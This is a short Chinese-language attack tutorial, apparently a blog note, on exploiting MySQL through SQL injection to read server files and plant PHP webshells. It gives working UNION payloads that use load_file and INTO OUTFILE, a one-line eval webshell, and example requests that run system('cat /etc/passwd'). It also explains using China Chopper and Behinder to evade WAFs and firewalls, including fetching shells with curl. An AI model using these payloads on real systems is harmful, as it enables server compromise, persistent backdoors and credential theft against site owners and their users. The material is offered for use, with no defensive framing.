阅读量: 114
文件读写与木马植入
一、读写权限确认
show global variables like '%secure%';
# 查看mysql全局变量的配置,当输入以上命令后,结果
secure_file_priv = 空 的时候,任意读写
secure_file_priv = 某个路径的时候,只能在规定的路径下读写
secure_file_priv = NULL 不能读写
二、读取文件
- 利用SQL语句读取系统文件,先读取常规文件(明确路径),如果能成功读取,则继续读取其他文件;如果明确知道路径,则尝试爆破路径下的文件;如果不知道路径,则爆破路径。
-1' union select 1,2,3,load_file("c:/windows/service.inf"),5,6
-1' union select 1,2,3,load_file("D:/XamppNew/htdics/security/commin.php"),5,6
三、写入木马
例如:select "helloworld" into outfile "/opt/lampp/htdocs/security/muma.php"
-1 union select 1,2,3,4,5,"<?php eval($_GET['a']);?>" intooutfile "D:/XamppNew/htdocs/security/temp/muma.php"
如果列数未知,也可以不停尝试,注入一次,访问一次,确认是否注入成功
一句话木马:
<?php eval($_POST['a']);?>
eval可以将一段字符串当成代码来执行,如果用户可以直接 将这段有效的PHP代码传入后台,则可以执行任意代码或指令
/security/temp/muma/php?a=phpinfo();
/security/temp/muma/php?a=echo date('Y-m-d');
/security/temp/muma/php?a=system('ip addr');
/security/temp/muma/php?a=system('cat /etc/passwd');
以上为GET请求的方式,也可以用POST请求的方式,这样可以添加的载荷更大,可以上传大马,但建议通过curl下载的方式植入大马
-1 union select 1,2,3,4,5,"<?php eval($_POST['a']);?>" intooutfile "D:/XamppNew/htdocs/security/temp/muma.php"
也可以上传一句话木马后,通过中国菜刀连接以便于操作
四、中国菜刀
- 必须提前已经我去南城了木马植入然后才能使用。
- 木马必须是POST请求,参数自定义,在菜刀中给出正确的参数名。
- 菜刀采用Base64编码,相当于明文传输,目前已经被WAF进行防护了
五、冰蝎
- 冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开防火墙
- 先上传一个冰蝎自己的带加密解密功能的shell脚本
- 上传shell的过程有以下方式
- 直接在命令行运行命令按行用echo写入
- 用curl通过公网进行远程文件下载
- 用菜刀连接,然后基于菜刀直接上传shell
- 如果目标站点存在文件上传漏洞,直接在文件上传的时候上传shell